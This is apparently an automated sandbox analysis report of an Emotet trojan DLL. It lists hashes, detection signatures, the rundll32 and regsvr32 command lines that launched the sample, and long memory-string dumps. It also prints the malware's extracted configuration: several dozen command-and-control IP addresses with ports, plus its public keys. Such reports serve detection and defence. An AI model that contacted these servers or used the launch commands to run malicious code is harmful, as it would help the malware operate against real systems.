Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
l2sFDHB0lp

Overview

General Information

Sample Name:l2sFDHB0lp (renamed file extension from none to dll)
Analysis ID:632747
MD5:b6ca42b6646e847ad826ebfc2e68d554
SHA1:cc06a349b47ca49503d5e2da477642c4fa95af8f
SHA256:91df13870c9b89883c0547af0c23b6c45d262781c593449a3356c0989ba88774
Tags:32dllexetrojan
Infos:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Machine Learning detection for sample
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
PE file contains strange resources
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Registers a DLL
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 7064 cmdline: loaddll32.exe "C:\Users\user\Desktop\l2sFDHB0lp.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 7092 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\l2sFDHB0lp.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 7112 cmdline: rundll32.exe "C:\Users\user\Desktop\l2sFDHB0lp.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 7100 cmdline: regsvr32.exe /s C:\Users\user\Desktop\l2sFDHB0lp.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • regsvr32.exe (PID: 5540 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Tqddippvufllrd\rwkkp.rhz" MD5: 426E7499F6A7346F0410DEAD0805586B)
    • rundll32.exe (PID: 7124 cmdline: rundll32.exe C:\Users\user\Desktop\l2sFDHB0lp.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5644 cmdline: rundll32.exe C:\Users\user\Desktop\l2sFDHB0lp.dll,DllUnregisterServerr MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • svchost.exe (PID: 6468 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6244 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6748 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5092 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3624 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["70.36.102.35:443", "92.240.254.110:8080", "51.91.76.89:8080", "217.182.25.250:8080", "119.193.124.41:7080", "45.142.114.231:8080", "176.56.128.118:443", "51.254.140.238:7080", "173.212.193.249:8080", "131.100.24.231:80", "188.44.20.25:443", "1.234.2.232:8080", "153.126.146.25:7080", "51.91.7.5:8080", "151.106.112.196:8080", "46.55.222.11:443", "107.182.225.142:8080", "82.165.152.127:8080", "212.237.17.99:8080", "195.201.151.129:8080", "197.242.150.244:8080", "103.43.46.182:443", "206.188.212.92:8080", "196.218.30.83:443", "5.9.116.246:8080", "185.157.82.211:8080", "176.104.106.96:8080", "159.65.88.10:8080", "212.24.98.99:8080", "209.250.246.206:443", "45.118.135.203:7080", "50.116.54.215:443", "178.79.147.66:8080", "72.15.201.15:8080", "101.50.0.91:8080", "103.75.201.2:443", "31.24.158.56:8080", "146.59.226.45:443", "110.232.117.186:8080", "138.185.72.26:8080", "45.176.232.124:443", "189.126.111.200:7080", "129.232.188.93:443", "158.69.222.101:443", "164.68.99.3:8080", "209.126.98.206:8080", "58.227.42.236:80", "203.114.109.124:443", "195.154.133.20:443", "192.99.251.50:443", "1.234.21.73:7080", "50.30.40.196:8080", "216.158.226.206:443", "185.8.212.130:7080", "159.8.59.82:8080", "45.118.115.99:8080", "167.99.115.35:8080", "79.172.212.216:8080"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.388781542.0000000000E51000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000005.00000002.388781542.0000000000E51000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000003.00000002.383767887.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000003.00000002.383767887.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000004.00000002.384631851.0000000000DD0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            Click to see the 15 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.rundll32.exe.e20000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              4.2.rundll32.exe.e20000.1.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                2.2.regsvr32.exe.41d0000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  2.2.regsvr32.exe.41d0000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    4.2.rundll32.exe.dd0000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                      Click to see the 25 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Snort Signatures

                      Timestamp:192.168.2.651.91.76.894978580802404336 05/24/22-00:16:29.728687
                      SID:2404336
                      Source Port:49785
                      Destination Port:8080
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 3.2.rundll32.exe.eb0000.0.raw.unpackMalware Configuration Extractor: Emotet {"C2 list": ["70.36.102.35:443", "92.240.254.110:8080", "51.91.76.89:8080", "217.182.25.250:8080", "119.193.124.41:7080", "45.142.114.231:8080", "176.56.128.118:443", "51.254.140.238:7080", "173.212.193.249:8080", "131.100.24.231:80", "188.44.20.25:443", "1.234.2.232:8080", "153.126.146.25:7080", "51.91.7.5:8080", "151.106.112.196:8080", "46.55.222.11:443", "107.182.225.142:8080", "82.165.152.127:8080", "212.237.17.99:8080", "195.201.151.129:8080", "197.242.150.244:8080", "103.43.46.182:443", "206.188.212.92:8080", "196.218.30.83:443", "5.9.116.246:8080", "185.157.82.211:8080", "176.104.106.96:8080", "159.65.88.10:8080", "212.24.98.99:8080", "209.250.246.206:443", "45.118.135.203:7080", "50.116.54.215:443", "178.79.147.66:8080", "72.15.201.15:8080", "101.50.0.91:8080", "103.75.201.2:443", "31.24.158.56:8080", "146.59.226.45:443", "110.232.117.186:8080", "138.185.72.26:8080", "45.176.232.124:443", "189.126.111.200:7080", "129.232.188.93:443", "158.69.222.101:443", "164.68.99.3:8080", "209.126.98.206:8080", "58.227.42.236:80", "203.114.109.124:443", "195.154.133.20:443", "192.99.251.50:443", "1.234.21.73:7080", "50.30.40.196:8080", "216.158.226.206:443", "185.8.212.130:7080", "159.8.59.82:8080", "45.118.115.99:8080", "167.99.115.35:8080", "79.172.212.216:8080"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}
                      Multi AV Scanner detection for submitted file
                      Source: l2sFDHB0lp.dllVirustotal: Detection: 64%Perma Link
                      Source: l2sFDHB0lp.dllReversingLabs: Detection: 68%
                      Antivirus / Scanner detection for submitted sample
                      Source: l2sFDHB0lp.dllAvira: detected
                      Machine Learning detection for sample
                      Source: l2sFDHB0lp.dllJoe Sandbox ML: detected
                      Source: l2sFDHB0lp.dllStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1002592C __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,2_2_1002592C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002592C __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,3_2_1002592C
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D31B61 FindFirstFileW,6_2_04D31B61

                      Networking

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 70.36.102.35 443Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 51.91.76.89 8080Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 92.240.254.110 8080Jump to behavior
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2404336 ET CNC Feodo Tracker Reported CnC Server TCP group 19 192.168.2.6:49785 -> 51.91.76.89:8080
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorIPs: 70.36.102.35:443
                      Source: Malware configuration extractorIPs: 92.240.254.110:8080
                      Source: Malware configuration extractorIPs: 51.91.76.89:8080
                      Source: Malware configuration extractorIPs: 217.182.25.250:8080
                      Source: Malware configuration extractorIPs: 119.193.124.41:7080
                      Source: Malware configuration extractorIPs: 45.142.114.231:8080
                      Source: Malware configuration extractorIPs: 176.56.128.118:443
                      Source: Malware configuration extractorIPs: 51.254.140.238:7080
                      Source: Malware configuration extractorIPs: 173.212.193.249:8080
                      Source: Malware configuration extractorIPs: 131.100.24.231:80
                      Source: Malware configuration extractorIPs: 188.44.20.25:443
                      Source: Malware configuration extractorIPs: 1.234.2.232:8080
                      Source: Malware configuration extractorIPs: 153.126.146.25:7080
                      Source: Malware configuration extractorIPs: 51.91.7.5:8080
                      Source: Malware configuration extractorIPs: 151.106.112.196:8080
                      Source: Malware configuration extractorIPs: 46.55.222.11:443
                      Source: Malware configuration extractorIPs: 107.182.225.142:8080
                      Source: Malware configuration extractorIPs: 82.165.152.127:8080
                      Source: Malware configuration extractorIPs: 212.237.17.99:8080
                      Source: Malware configuration extractorIPs: 195.201.151.129:8080
                      Source: Malware configuration extractorIPs: 197.242.150.244:8080
                      Source: Malware configuration extractorIPs: 103.43.46.182:443
                      Source: Malware configuration extractorIPs: 206.188.212.92:8080
                      Source: Malware configuration extractorIPs: 196.218.30.83:443
                      Source: Malware configuration extractorIPs: 5.9.116.246:8080
                      Source: Malware configuration extractorIPs: 185.157.82.211:8080
                      Source: Malware configuration extractorIPs: 176.104.106.96:8080
                      Source: Malware configuration extractorIPs: 159.65.88.10:8080
                      Source: Malware configuration extractorIPs: 212.24.98.99:8080
                      Source: Malware configuration extractorIPs: 209.250.246.206:443
                      Source: Malware configuration extractorIPs: 45.118.135.203:7080
                      Source: Malware configuration extractorIPs: 50.116.54.215:443
                      Source: Malware configuration extractorIPs: 178.79.147.66:8080
                      Source: Malware configuration extractorIPs: 72.15.201.15:8080
                      Source: Malware configuration extractorIPs: 101.50.0.91:8080
                      Source: Malware configuration extractorIPs: 103.75.201.2:443
                      Source: Malware configuration extractorIPs: 31.24.158.56:8080
                      Source: Malware configuration extractorIPs: 146.59.226.45:443
                      Source: Malware configuration extractorIPs: 110.232.117.186:8080
                      Source: Malware configuration extractorIPs: 138.185.72.26:8080
                      Source: Malware configuration extractorIPs: 45.176.232.124:443
                      Source: Malware configuration extractorIPs: 189.126.111.200:7080
                      Source: Malware configuration extractorIPs: 129.232.188.93:443
                      Source: Malware configuration extractorIPs: 158.69.222.101:443
                      Source: Malware configuration extractorIPs: 164.68.99.3:8080
                      Source: Malware configuration extractorIPs: 209.126.98.206:8080
                      Source: Malware configuration extractorIPs: 58.227.42.236:80
                      Source: Malware configuration extractorIPs: 203.114.109.124:443
                      Source: Malware configuration extractorIPs: 195.154.133.20:443
                      Source: Malware configuration extractorIPs: 192.99.251.50:443
                      Source: Malware configuration extractorIPs: 1.234.21.73:7080
                      Source: Malware configuration extractorIPs: 50.30.40.196:8080
                      Source: Malware configuration extractorIPs: 216.158.226.206:443
                      Source: Malware configuration extractorIPs: 185.8.212.130:7080
                      Source: Malware configuration extractorIPs: 159.8.59.82:8080
                      Source: Malware configuration extractorIPs: 45.118.115.99:8080
                      Source: Malware configuration extractorIPs: 167.99.115.35:8080
                      Source: Malware configuration extractorIPs: 79.172.212.216:8080
                      Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                      Source: Joe Sandbox ViewIP Address: 217.182.25.250 217.182.25.250
                      Source: Joe Sandbox ViewIP Address: 151.106.112.196 151.106.112.196
                      Source: global trafficTCP traffic: 192.168.2.6:49775 -> 92.240.254.110:8080
                      Source: global trafficTCP traffic: 192.168.2.6:49785 -> 51.91.76.89:8080
                      Source: unknownNetwork traffic detected: IP country count 28
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                      Source: unknownTCP traffic detected without corresponding DNS query: 70.36.102.35
                      Source: unknownTCP traffic detected without corresponding DNS query: 70.36.102.35
                      Source: unknownTCP traffic detected without corresponding DNS query: 70.36.102.35
                      Source: unknownTCP traffic detected without corresponding DNS query: 70.36.102.35
                      Source: unknownTCP traffic detected without corresponding DNS query: 70.36.102.35
                      Source: unknownTCP traffic detected without corresponding DNS query: 70.36.102.35
                      Source: unknownTCP traffic detected without corresponding DNS query: 70.36.102.35
                      Source: unknownTCP traffic detected without corresponding DNS query: 70.36.102.35
                      Source: unknownTCP traffic detected without corresponding DNS query: 70.36.102.35
                      Source: unknownTCP traffic detected without corresponding DNS query: 70.36.102.35
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.240.254.110
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.240.254.110
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.240.254.110
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.91.76.89
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.91.76.89
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.91.76.89
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.91.76.89
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.91.76.89
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.91.76.89
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.91.76.89
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.91.76.89
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.91.76.89
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.91.76.89
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.91.76.89
                      Source: svchost.exe, 00000016.00000003.635665021.00000228C5977000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN"," equals www.facebook.com (Facebook)
                      Source: svchost.exe, 00000016.00000003.635665021.00000228C5977000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN"," equals www.twitter.com (Twitter)
                      Source: svchost.exe, 00000016.00000003.635673341.00000228C5988000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-05-13T10:00:01.2192622Z||.||8adb3f26-c14b-4fc0-afb3-91b3c6daaa3f||1152921505694830749||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                      Source: svchost.exe, 00000016.00000003.635673341.00000228C5988000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-05-13T10:00:01.2192622Z||.||8adb3f26-c14b-4fc0-afb3-91b3c6daaa3f||1152921505694830749||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                      Source: svchost.exe, 00000016.00000003.635673341.00000228C5988000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify - Music and Podcasts","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX